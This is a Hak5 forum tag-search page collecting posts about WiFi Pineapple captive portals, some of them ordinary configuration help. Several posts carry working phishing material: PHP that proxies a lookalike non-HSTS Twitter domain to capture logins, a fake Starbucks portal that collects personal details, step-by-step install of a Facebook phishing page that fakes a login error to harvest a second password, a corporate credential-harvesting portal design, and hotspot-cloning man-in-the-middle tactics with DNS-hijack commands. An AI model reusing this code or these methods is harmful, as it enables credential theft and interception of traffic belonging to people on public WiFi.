Jump to content

Search the Community

Showing results for tags 'portal'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 12 results

  1. I've started porting Portal Auth from the MKV. I will keep this updated as I progress but it may take some time as there is a lot to this module. Update: Added new screenshots in the spoiler above. I also added the code to my GitHub page so you guys can download and test while I finish development if you want. It's almost done but still missing a couple of features. Let me know if there are any issues (aside from unimplemented features) that need to be fixed if you choose to test the module.
  2. Hey guys, I've ran into a bit of trouble, could some kind soul help me out please? I'm unable to access POST and GET variables from within the landing page's php if there is a path specified in the URL that isn't "index.php" Example landing page code below, var_dump($_POST) on line 12 returns an empty array despite the form sending the data: <?php if(!strstr($_SERVER['HTTP_HOST'],"twitter") && !strstr($_SERVER['HTTP_HOST'],"twimg") ) { /* If not visiting twitter, redirect to non-HSTS twitter domain */ die('<meta http-equiv="refresh" content="0; url=http://twitter.co.uk/">'); } else { /* form posts to http://twitter.co.uk/sessions */ if(strstr($_SERVER['REQUEST_URI'], "/sessions")) { /* var_dump($_POST) returns an empty array, should print login data */ var_dump($_POST); die(); } /* Curl the site */ $curl = curl_init(); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_URL, $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($curl); $result = str_replace('https://twitter.com', 'http://twitter.co.uk', $result); /* changes the form action */ $result = str_replace('<script', "<div style='display:none'><!--", $result); $result = str_replace('</script', "--></div", $result); echo $result; } ?> if I make the form post to http://twitter.co.ukdirectly, without the /session - they are accessible from the landing page, but I would really like to be able to access them even with other filepaths.
  3. Hi, i try to bypass my pfsense captive portal. Have someone a working Solution? Thanks, Daniel
  4. Hey guys i watched a tut on youtube to get my captive portal working it it sumbits one line of text to a stored.txt file, but i wanna have more then one thing sent to the stored.txt file can anyone help this is the code im useing. <html> <head> <title>Star Bucks Wifi</title> <meta HTTP-EQUIV="Pragma" CONTENT="no-cache"> <script type="text/javascript"> function submitTextToCapture() { text = document.getElementById("textinput").value; text = document.getElementById("FirstName").value; window.location = "http://172.16.42.1/capture.php?text=" + text + "&redir=$authtarget"; } </script> </head> <body bgcolor="#DDDDDD" text="#000000"> <table border="0" cellpadding="2" cellspacing="0" width="100%"> <tr> <td align=center> <h2>Star Bucks Wifi</h2> </td> </tr> <tr> <td align=center height="120"> <form class="form-horizontal"> <fieldset> <!-- Form Name --> <legend>Star Bucks Wifi</legend> <!-- Text input--> <div class="form-group"> <label class="col-md-4 control-label" for="First Name">First name:</label> <div class="col-md-4"> <input id="FirstName" name="First Name" placeholder="Joe" class="form-control input-md" required="" type="text"> <span class="help-block">Please Type Your First Name</span> </div> </div> <!-- Text input--> <div class="form-group"> <label class="col-md-4 control-label" for="">Last name:</label> <div class="col-md-4"> <input id="" name="" placeholder="Doe" class="form-control input-md" required="" type="text"> <span class="help-block">Please Type Your Last Name</span> </div> </div> <!-- Text input--> <div class="form-group"> <label class="col-md-4 control-label" for="textinput">Address:</label> <div class="col-md-4"> <input id="textinput" name="textinput" placeholder="123 Fairly Lane" class="form-control input-md" required="" type="text"> <span class="help-block">Please Type Your Address</span> </div> </div> <!-- Text input--> <div class="form-group"> <label class="col-md-4 control-label" for="textinput">Postal Code:</label> <div class="col-md-4"> <input id="textinput" name="textinput" placeholder="A1B-2C3" class="form-control input-md" required="" type="text"> <span class="help-block">Please Type Your Postal Code</span> </div> </div> <!-- Text input--> <div class="form-group"> <label class="col-md-4 control-label" for="textinput">City/Town:</label> <div class="col-md-4"> <input id="textinput" name="textinput" placeholder="Toronto" class="form-control input-md" required="" type="text"> <span class="help-block">What City or Town you Live In?</span> </div> </div> <!-- Select Basic --> <div class="form-group"> <label class="col-md-4 control-label" for="selectbasic">Province</label> <div class="col-md-4"> <select id="selectbasic" name="selectbasic" class="form-control"> <option value="1">Alberta</option> <option value="2">British Columbia</option> <option value="">Manitoba</option> <option value="">New Brunswick</option> <option value="">Newfoundland and Labrador</option> <option value="">Northwest Territories</option> <option value="">Nova Scotia</option> <option value="">Nunavut</option> <option value="">Ontario</option> <option value="">Prince Edward Island</option> <option value="">Quebec</option> <option value="">Saskatchewan</option> <option value="">Yukon Territory</option> </select> </div> </div> <!-- Text input--> <div class="form-group"> <label class="col-md-4 control-label" for="textinput">Phone Number:</label> <div class="col-md-4"> <input id="textinput" name="textinput" placeholder="123-456-7890" class="form-control input-md" required="" type="text"> <span class="help-block">Please Type Your Phone Number</span> </div> </div> </fieldset> </form> <input type="text" id="userText" placeholder="enter some text" required> <button type="button" id="button" onclick="submitTextToCapture()">Pay</button> </form> <a href="$authtarget"> </a> </td> </tr> </table> </body> </html>
  5. Hello everyone, I have create a very simple html which is the only page i want my clients to see. Like a captive portal but not intrested in giving them internet connection. I am having problems with nodogsplash which does not redirect any traffic when my pineapple is not connected to the internet. I know i can use "Evil Portal" but i am trying to make this manual. I also noticed that nodogsplash is at 0.9_beta9.9.9 but opkg brings 0.9_beta9.9.6 (not only pineapple, openwrt too) Does the pineapple have to be connected to the internet for nodogsplash to work? Is there a way to replicate the iptables rules nodogsplash creates? Is there any good alternative "captive portal manager" you can suggest? My nodogsplash.conf My /etc/config/dhcp Running: nodogsplash -d 7 -f and it stays like this even when clients connect. As an alternative i tried dnsspoof and iptables (one at a time and both together) My spooofhost.conf dnsspoof -i br-lan -f spoofhost.conf iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to-destination 172.16.42.1 and iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1 In this case it redirects traffic to 172.16.42.1 but if pineapple is not connected to the internet Android and iPhone Devices cannot betect the "captive portal" and pop the pseudo browser.
  6. Dear hak5 community thanks for the wonderful tool and the help given until now now i am on a project that maybe someone did already and can give me some tips or point me to some tutorial i want to give free wifi access to users i set up the mkv with a yagi antenna i want to create a portal for login that 1) displays adsense and banners 2) requires login with facebook or twitter credentials, and once logged in will post or retweet something for number one doesnt seem too big of a issue, but i dont know where to start for number too i am looking for a facebook and tweeter app developer that will create an app that will post and tweet i do not need to get the credentials they are login in with, but i need to get something in return for the free internet i offer also, is there a way to limit the bandwidth that is given to the AP? thanks in advance
  7. hey guys! So I have my new Evil Portal set up and everything works fine on mobile devices, however, for some reason the computers that connect will not get through to the internet even when I try opening all the ports for Auth and pre auth users, heres the config file. I will attach the splash page as well, possibly didnt apply authuser properly. # # Nodogsplash Configuration File # # Parameter: GatewayInterface # Default: NONE # # GatewayInterface is not autodetected, has no default, and must be set here. # Set GatewayInterface to the interface on your router # that is to be managed by Nodogsplash. # Typically br-lan for the wired and wireless lan on OpenWrt White Russian. # May be br-lan on OpenWrt Kamikaze. # GatewayInterface br-lan # FirewallRuleSet: authenticated-users # # Control access for users after authentication. # These rules are inserted at the beginning of the # FORWARD chain of the router's filter table, and # apply to packets that have come in to the router # over the GatewayInterface from MAC addresses that # have authenticated with Nodogsplash, and that are # destined to be routed through the router. The rules are # considered in order, and the first rule that matches # a packet applies to it. # If there are any rules in this ruleset, an authenticated # packet that does not match any rule is rejected. # N.B.: This ruleset is completely independent of # the preauthenticated-users ruleset. # FirewallRuleSet authenticated-users { # You may want to open access to a machine on a local # subnet that is otherwise blocked (for example, to # serve a redirect page; see RedirectURL). If so, # allow that explicitly here, e.g: FirewallRule allow tcp port 80 to 192.168.254.254 # Your router may have several interfaces, and you # probably want to keep them private from the GatewayInterface. # If so, you should block the entire subnets on those interfaces, e.g.: FirewallRule block to 192.168.0.0/16 FirewallRule block to 10.0.0.0/8 # Typical ports you will probably want to open up include # 53 udp and tcp for DNS, # 80 for http, # 443 for https, # 22 for ssh: FirewallRule allow tcp port 53 FirewallRule allow udp port 53 FirewallRule allow tcp port 80 FirewallRule allow tcp port 443 FirewallRule allow tcp port 22 FirewallRule allow tcp port 1471 FirewallRule allow tcp port 8080 } # end FirewallRuleSet authenticated-users # FirewallRuleSet: preauthenticated-users # # Control access for users before authentication. # These rules are inserted in the PREROUTING chain # of the router's nat table, and in the # FORWARD chain of the router's filter table. # These rules apply to packets that have come in to the # router over the GatewayInterface from MAC addresses that # are not on the BlockedMACList or TrustedMACList, # are *not* authenticated with Nodogsplash. The rules are # considered in order, and the first rule that matches # a packet applies to it. A packet that does not match # any rule here is rejected. # N.B.: This ruleset is completely independent of # the authenticated-users and users-to-router rulesets. # FirewallRuleSet preauthenticated-users { # For preauthenticated users to resolve IP addresses in their initial # request not using the router itself as a DNS server, # you probably want to allow port 53 udp and tcp for DNS. FirewallRule allow tcp port 53 FirewallRule allow udp port 53 # For splash page content not hosted on the router, you # will want to allow port 80 tcp to the remote host here. # Doing so circumvents the usual capture and redirect of # any port 80 request to this remote host. # Note that the remote host's numerical IP address must be known # and used here. # FirewallRule allow tcp port 80 to 123.321.123.321 } # end FirewallRuleSet preauthenticated-users # FirewallRuleSet: users-to-router # # Control access to the router itself from the GatewayInterface. # These rules are inserted at the beginning of the # INPUT chain of the router's filter table, and # apply to packets that have come in to the router # over the GatewayInterface from MAC addresses that # are not on the TrustedMACList, and are destined for # the router itself. The rules are # considered in order, and the first rule that matches # a packet applies to it. # If there are any rules in this ruleset, a # packet that does not match any rule is rejected. # FirewallRuleSet users-to-router { # Nodogsplash automatically allows tcp to GatewayPort, # at GatewayAddress, to serve the splash page. # However you may want to open up other ports, e.g. # 53 for DNS and 67 for DHCP if the router itself is # providing these services. FirewallRule allow udp port 53 FirewallRule allow tcp port 53 FirewallRule allow udp port 67 FirewallRule allow udp port 1471 FirewallRule allow udp port 8080 # You may want to allow ssh, http, and https to the router # for administration from the GatewayInterface. If not, # comment these out. FirewallRule allow tcp port 22 FirewallRule allow tcp port 80 FirewallRule allow tcp port 443 FirewallRule allow tcp port 8080 FirewallRule allow tcp port 1471 } # end FirewallRuleSet users-to-router # EmptyRuleSetPolicy directives # The FirewallRuleSets that NoDogSplash permits are: # # authenticated-users # preauthenticated-users # users-to-router # trusted-users # trusted-users-to-router # # For each of these, an EmptyRuleSetPolicy can be specified. # An EmptyRuleSet policy applies to a FirewallRuleSet if the # FirewallRuleSet is missing from this configuration file, # or if it exists but contains no FirewallRules. # # The possible values of an EmptyRuleSetPolicy are: # allow -- packets are accepted # block -- packets are rejected # passthrough -- packets are passed through to pre-existing firewall rules # # Default EmptyRuleSetPolicies are set as follows: # EmptyRuleSetPolicy authenticated-users passthrough # EmptyRuleSetPolicy preauthenticated-users block # EmptyRuleSetPolicy users-to-router block # EmptyRuleSetPolicy trusted-users allow # EmptyRuleSetPolicy trusted-users-to-router allow # Parameter: GatewayName # Default: NoDogSplash # # Set GatewayName to the name of your gateway. This value # will be available as variable $gatewayname in the splash page source # and in status output from ndsctl, but otherwise doesn't matter. # If none is supplied, the value "NoDogSplash" is used. # # GatewayName NoDogSplash # Parameter: GatewayAddress # Default: Discovered from GatewayInterface # # This should be autodetected on an OpenWRT system, but if not: # Set GatewayAddress to the IP address of the router on # the GatewayInterface. This is the address that the Nodogsplash # server listens on. # # GatewayAddress 192.168.1.1 # Parameter: ExternalInterface # Default: Autodetected from /proc/net/route # # This should be autodetected on a OpenWRT system, but if not: # Set ExtrnalInterface to the 'external' interface on your router, # i.e. the one which provides the default route to the internet. # Typically vlan1 for OpenWRT. # # ExternalInterface vlan1 # Parameter: RedirectURL # Default: none # # After authentication, normally a user is redirected # to their initially requested page. # If RedirectURL is set, the user is redirected to this URL instead. # # RedirectURL http://www.ilesansfil.org/ # Parameter: GatewayPort # Default: 2050 # # Nodogsplash's own http server uses GatewayAddress as its IP address. # The port it listens to at that IP can be set here; default is 2050. # GatewayPort 80 # Parameter: MaxClients # Default: 20 # # Set MaxClients to the maximum number of users allowed to # connect at any time. (Does not include users on the TrustedMACList, # who do not authenticate.) # # MaxClients 20 # ClientIdleTimeout # Parameter: ClientIdleTimeout # Default: 10 # # Set ClientIdleTimeout to the desired of number of minutes # of inactivity before a user is automatically 'deauthenticated'. # # ClientIdleTimeout 10 # Parameter: ClientForceTimeout # Default: 360 # # Set ClientForceTimeout to the desired number of minutes before # a user is automatically 'deauthenticated', whether active or not # # ClientForceTimeout 360 # Parameter: AuthenticateImmediately # Default: no # # Set to yes (or true or 1), to immediately authenticate users # who make a http port 80 request on the GatewayInterface (that is, # do not serve a splash page, just redirect to the user's request, # or to RedirectURL if set). # # AuthenticateImmediately no # Parameter: MACMechanism # Default: block # # Either block or allow. # If 'block', MAC addresses on BlockedMACList are blocked from # authenticating, and all others are allowed. # If 'allow', MAC addresses on AllowedMACList are allowed to # authenticate, and all other (non-trusted) MAC's are blocked. # # MACMechanism block # Parameter: BlockedMACList # Default: none # # Comma-separated list of MAC addresses who will be completely blocked # from the GatewayInterface. Ignored if MACMechanism is allow. # N.B.: weak security, since MAC addresses are easy to spoof. # # BlockedMACList 00:00:DE:AD:BE:EF,00:00:C0:1D:F0:0D # Parameter: AllowedMACList # Default: none # # Comma-separated list of MAC addresses who will not be completely # blocked from the GatewayInterface. Ignored if MACMechanism is block. # N.B.: weak security, since MAC addresses are easy to spoof. # # AllowedMACList 00:00:12:34:56:78 # Parameter: TrustedMACList # Default: none # # Comma-separated list of MAC addresses who are not subject to # authentication, and are not restricted by any FirewallRuleSet. # N.B.: weak security, since MAC addresses are easy to spoof. # # TrustedMACList 00:00:CA:FE:BA:BE, 00:00:C0:01:D0:0D # Parameter: PasswordAuthentication # Default: no # Set to yes (or true or 1), to require a password matching # the Password parameter to be supplied when authenticating. # # # PasswordAuthentication no # Parameter: Password # Default: none # Whitespace delimited string that is compared to user-supplied # password when authenticating. # # # Password nodog # Parameter: UsernameAuthentication # Default: no # Set to yes (or true or 1), to require a username matching # the Username parameter to be supplied when authenticating. # # # UsernameAuthentication no # Parameter: Username # Default: none # Whitespace delimited string that is compared to user-supplied # username when authenticating. # # # Username guest # Parameter: PasswordAttempts # Default: 5 # Integer number of failed password/username entries before # a user is forced to reauthenticate. # # # PasswordAttempts 5 # Parameter: TrafficControl # Default: no # # Set to yes (or true or 1), to enable traffic control in Nodogsplash. # # TrafficControl no # Parameter: DownloadLimit # Default: 0 # # If TrafficControl is enabled, this sets the maximum download # speed to the GatewayInterface, in kilobits per second. # For example if you have an ADSL connection with 768 kbit # download speed, and you want to allow about half of that # bandwidth for the GatewayInterface, set this to 384. # A value of 0 means no download limiting is done. # # DownloadLimit 384 # Parameter: UploadLimit # Default: 0 # # If TrafficControl is enabled, this sets the maximum upload # speed from the GatewayInterface, in kilobits per second. # For example if you have an ADSL connection with 128 kbit # upload speed, and you want to allow about half of that # bandwidth for the GatewayInterface, set this to 64. # A value of 0 means no upload limiting is done. # # UploadLimit 64 # Paramter: GatewayIPRange # Default: 0.0.0.0/0 # # By setting this parameter, you can specify a range of IP addresses # on the GatewayInterface that will be responded to and managed by # Nodogsplash. Addresses outside this range do not have their packets # touched by Nodogsplash at all. # Defaults to 0.0.0.0/0, that is, all addresses. # # GatewayIPRange 0.0.0.0/0 --------------------------------------------------------------------------------------------------------------- Below is the html ---------------------------------------------------------------------------------------------------------------\ <!DOCTYPE html> <html> <head> <meta charset="UTF-8 "HTTP-EQUIV="Pragma" CONTENT="no-cache"> <title>$gatewayname Entry</title> <style> * { margin: 0; padding: 0; } html { background: url($imagesdir/background.jpg) no-repeat center center fixed; -webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover; background-size: cover; } #page-wrap { width: 400px; margin: 50px auto; padding: 20px; background: white; -moz-box-shadow: 0 0 20px black; -webkit-box-shadow: 0 0 20px black; box-shadow: 0 0 20px black; } p { font: 15px/2 Georgia, Serif; margin: 0 0 30px 0; text-indent: 40px; } </style> </head> <body> <div id="contact-form"> <form id="contact" method="post" action=""> <fieldset> <h3>For Free Wifi enter the information below</h3> <label for="name">Name</label> <input type="text" name="name" placeholder="Full Name" title="Enter your name" class="required"> <label for="email">E-mail</label> <input type="email" name="email" placeholder="yourname@domain.com" title="Enter your e-mail address" class="required email"> <label for="phone">Phone</label> <input type="tel" name="phone" placeholder="ex. (555) 555-5555"> <div style="overflow:auto;height:100px;"> This agreement sets out the terms and conditions on which wireless internet access (the Service) is provided free of charge to you, a guest, vendor, board member or employee of The Financial Services Network (Network). Your access to the Service is completely at the discretion of the Network. Access to the Service may be blocked, suspended, or terminated at any time for any reason including, but not limited to, violation of this Agreement, actions that may lead to liability for the Network, disruption of access to other users or networks, and violation of applicable laws or regulations. The Network reserves the right to monitor and collect information while you are connected to the Service and that the collected information can be used at discretion of the the Network, including sharing the information with any law enforcement agencies, the Network partners and/or the Network vendors. The Network may revise this Agreement at any time. You must accept this Agreement each time you use the Service and it is your responsibility to review it for any changes each time. We reserve the right at all times to withdraw the Service, change the specifications or manner of use of the Service, to change access codes, usernames, passwords or other security information necessary to access the service. Any transmissions through this wireless router are the property of the Network and may be used for educational purposes. All packets captured by this access point may be used for presentation during our conferences. This is a really bad idea, by connecting to open networks you are broadcasting your transmissions openly to anyone who may want to steal them. IF YOU DO NOT AGREE WITH THESE TERMS, INCLUDING CHANGES THERETO, DO NOT ACCESS OR USE THE SERVICE. </div> <a href="$authtarget"> <img src="$imagesdir/continue.png" width="280"height="114"border="0" alt="Click to enter" title="Click to enter"> </a> </fieldset> </form> </div><!-- /end #contact-form --> <style type="text/css" style="display: none !important;"> * { margin: 0; padding: 0; } body { overflow-x: hidden; } #demo-top-bar { text-align: left; background: #222; position: relative; zoom: 1; width: 100% !important; z-index: 6000; padding: 20px 0 20px; } #demo-bar-inside { width: 960px; margin: 0 auto; position: relative; } #demo-bar-buttons { padding-top: 10px; float: right; } #demo-bar-buttons a { font-size: 12px; margin-left: 20px; color: white; margin: 2px 0; text-decoration: none; font: 14px "Lucida Grande", Sans-Serif !important; } #demo-bar-buttons a:hover, #demo-bar-buttons a:focus { text-decoration: underline; } #demo-bar-badge { display: inline-block; width: 302px; padding: 0 !important; margin: 0 !important; background-color: transparent !important; } #demo-bar-badge a { display: block; width: 100%; height: 38px; border-radius: 0; bottom: auto; margin: 0; background: url(/images/examples-logo.png) no-repeat; background-size: 100%; overflow: hidden; text-indent: -9999px; } #demo-bar-badge:before, #demo-bar-badge:after { display: none !important; } form#contact fieldset { position: relative; width: 300px; margin: 50px auto; padding: 20px; background: white; -moz-box-shadow: 0 0 20px black; -webkit-box-shadow: 0 0 20px black; box-shadow: 0 0 20px black; } form#contact input[type=text], input[type=url], input[type=email], input[type=tel], textarea { margin: 3px 0 0 0; padding: 6px; width: 260px; font-family: arial, sans-serif; font-size: 12px; border: 1px solid #ccc; background: -webkit-gradient(linear, left top, left 15, from(#FFFFFF), color-stop(4%, #f4f4f4), to(#FFFFFF)); background: -moz-linear-gradient(top, #FFFFFF, #f4f4f4 1px, #FFFFFF 15px); } form#contact textarea { width: 275px; height: 150px; } form#contact label { display: block; font-size: 13px; color: #666; margin-top: 10px; font-weight: bold; } form#contact label.error { width: 270px; margin: 3px 0 0 0; display: block; color: #cf0101; font-size: 11px; text-align: right; } form#contact .placeholder { color: #aaa; } form#contact .button { display: inline-block; margin: 15px 0 0 90px; padding: 5px 15px 5px 15px; background-color: #ff9e00; border: none; color: #fff; -moz-border-radius: 15px; -webkit-border-radius: 15px; border-radius: 15px; } form#contact .button:hover { background-color: #fc8500; cursor: pointer; } form#contact .button:active { margin-top: 16px; background-color: #f08004; cursor: pointer; } </style> </body> <script type="text/javascript"> document.getElementById("submit").onclick = function () { location.href = "www.google.com"; }; </script> </html>
  8. There is "normal" concept of using the Pineapple in the field which essentially looks like: wlan0 = "FreeWiFi" , wlan1 = client mode connected to "BoingoHotspot" : Under this configuration you as the pineapple owner are responsible for getting through the wlan1 "BoingoHotspot" splash page/portal first so that you are actually sharing their connection but no one on FreeWiFi knows this. But, what I like to call HotSpot Piggybacking looks something like this: wlan0 = "BoingoHotspot2", wlan1 = client mode connected to "BoingoHotspot" : With this configuration you are fishing for a legitimate BoingoHotspot user to authenticate themselves on what they believe is a legitimate Boingo AP. It looks and behaves exactly like the real thing because they are seeing the real splash page. But, once they authenticate themselves you and any other user on the Pineapple afterwards has internet. Also, you are still the MITM and can see all users traffic i.e. use tcpdump or ettercap or turn on sslstrip etc. Does anybody else use this method? I realize it can take time, but I think it's a viable alternative if you don't have free wifi around or a cell stick/hotspot to use with your pineapple. And it can work in coffee shops or airports equally well, it just requires a high turnover of users who logon to their local account with the hotspot provider.
  9. Hello everyone, so i am playing with my pineapple the last few days trying to make a captive portal. I noticed that nodogsplash only redirects traffic when the pineapple has internet connection. Also because of that, the psedo-browser iOS 6 and 7 (and now android 4.4) are using to detect captive portals is not poping up. Actually this is what i want... to make this pop-up browser to appear every time one of those O.S are connecting but with out having my pineapple connected to the internet... It has something to do with the way nodogsplash sets up iptables ( i think ).. If everyone has something to suggest i would appreciate it :)
  10. Just wanted to share the custom landing page that I created for Nodogsplash and the Evil Portal infusion. You can download the package from the link provided below. The package includes the image files, splash page html code, and my PDS projects. Feel free to customize or improve the files and enjoy! Download the package - http://www.sunstudiophoto.com/pineapple/portal.zip If you need help installing Evil Portal and setting up your captive portal, watch my full-length tutorial - "http://youtu.be/nw4bo4rXGgQ" Here are some screenshots of the portal. The first screenshot shows the portal without any user interaction. The second screenshot shows the portal after the user has scrolled over the accept button (a check mark appears).
  11. Hey! The page that is used is not created by me , its made by the maker of <snip>! i have only made it work for the pineapple!! Requirements: 1.Evil Portal infusion 2.putty or an other way to ssh into your pineapple 3.win scp or an other way to scp into your pineapple 4. internet connection on your pc and pineapple Installation: 1. Download: <snip - link removed> 2. Scp install.sh into the root ("/") directory on your pineapple. 3. Ssh into your pineapple and navigate to your root folder : cd / 4. type : bash install.sh and then hit enter. 5. when it says "installed , have a nice day" then its finished. 6. now go to the WebUI of your pineapple and go to the large tile of NoDogSplash/EvilPortal 7. Follow The Instructions it gives you and once everything is set up click on "start nodogsplash" 8. Your done happy phising! ThroubleShoot 1.if you go to any page and it loads normally or it gives an error go to the configuration tab on the WebUI and click DNSSpoof and if anything is in there delete it and then put :172.16.42.1 * in there and enable DNSSpoof. 2. it is supposed to only give an "incorrect login" message because you then have more chance that people go back and type their facebook login in and if its wrong they do it again but then with gmail and you have both! :) Disclaimer: I am not responsible for any malicious activity you do with this page ! I am not trying to encourage malicious activity i made this out of curiosity if it would work ! If anything is wrong or if you have any questions please leave them below!
  12. First off, my web dev skills are greatly rusty these days. It's been a while since I've had the chance to work on anything. Anyway, I was thinking about a way to use the MKIV for a targeted phishing attack. The Idea: A captive portal for harvesting domain credentials of a targeted company (for legitimate pen testing engagements). Using Karma (and possibly a deauth flood), clients connect to the MKIV. DNSSpoof forwards all requests to the local index.php which checks if the client has a valid session. If session is valid, it redirects the client to their requested URL. If session is NOT valid, it redirects the client to captiveportal.html where they are prompted to login with their domain credentials. Submitting the form POSTs to process.php which opens creds.txt, writes the entered credentials, builds the session, and redirects to success.html. Success page makes the client feel good and then redirects to the originally requested page. Implementation: I have attached* what I have done so far for anyone that wants to help out. I currently have a few of the pages done up. Index.php is properly redirecting to captiveportal.html, but when I submit the form I just get a blank white page for process.php. It doesn't look like it ever writes out the credentials or builds any session info. Drawing blanks on that for now. Any thoughts, feedback, code is appreciated. I'd like to eventually get this to the point that it can be wrapped up into a module/infusion for quick and easy implementation. This way, attacking companies with better wireless implementations becomes easier. You no longer have to use freeradius-wpe to capture the challenge/response and then crack. Why waste that time when you can just ask them nicely for their credentials? *It won't let me upload any of the files, so I threw it up in on github here: https://github.com/vidkun/captivePhish
×
×
  • Create New...